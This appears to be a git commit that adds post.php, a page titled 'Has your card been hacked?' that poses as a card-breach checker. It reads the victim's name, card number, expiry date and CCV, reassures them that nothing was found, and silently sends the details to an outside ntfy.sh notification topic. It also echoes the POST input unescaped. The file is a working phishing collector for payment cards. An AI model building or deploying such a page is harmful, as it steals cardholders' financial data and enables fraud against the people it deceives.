Add post.php
This commit is contained in:
parent
898db08c8f
commit
c90d16a3ad
1 changed files with 55 additions and 0 deletions
55
post.php
Normal file
55
post.php
Normal file
|
@ -0,0 +1,55 @@
|
|||
<!DOCTYPE html>
|
||||
<html lang="en">
|
||||
<head>
|
||||
<meta charset="UTF-8">
|
||||
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
||||
<title>Has your card been hacked?</title>
|
||||
<style>
|
||||
body {
|
||||
font-family: Arial, sans-serif;
|
||||
background-color: #f5f5f5;
|
||||
margin: 0;
|
||||
padding: 0;
|
||||
display: flex;
|
||||
flex-direction: column;
|
||||
align-items: center;
|
||||
}
|
||||
header {
|
||||
background-color: #4CAF50;
|
||||
color: white;
|
||||
padding: 1rem;
|
||||
width: 100%;
|
||||
text-align: center;
|
||||
}
|
||||
h1 {
|
||||
font-size: 1.5rem;
|
||||
margin-bottom: 1rem;
|
||||
}
|
||||
footer, address {
|
||||
text-align: center;
|
||||
margin: 1rem 0;
|
||||
}
|
||||
</style>
|
||||
<body>
|
||||
<?php
|
||||
$name = $_POST["name"];
|
||||
$ccv = $_POST["ccv"];
|
||||
$exp = $_POST["exp"];
|
||||
$ccnumber = $_POST["ccnumber"];
|
||||
$content = "$name, $ccv, $exp, $ccnumber"; ?>
|
||||
<p>You're lucky, we didn't find it. Your card details:</p>
|
||||
<?php echo $_POST["name"]; ?>
|
||||
<?php echo $_POST["exp"]; ?>
|
||||
<?php echo $_POST["ccnumber"]; ?>
|
||||
<?php echo $_POST["ccv"]; ?>
|
||||
<?php file_get_contents('https://ntfy.sh/REPLACE_THIS', false, stream_context_create([
|
||||
'http' => [
|
||||
'method' => 'POST',
|
||||
'header' => 'Content-Type: text/plain',
|
||||
'content' => $content
|
||||
]
|
||||
])); ?>
|
||||
</body>
|
||||
<footer>
|
||||
<p>©</p>
|
||||
</html>
|
Loading…
Reference in a new issue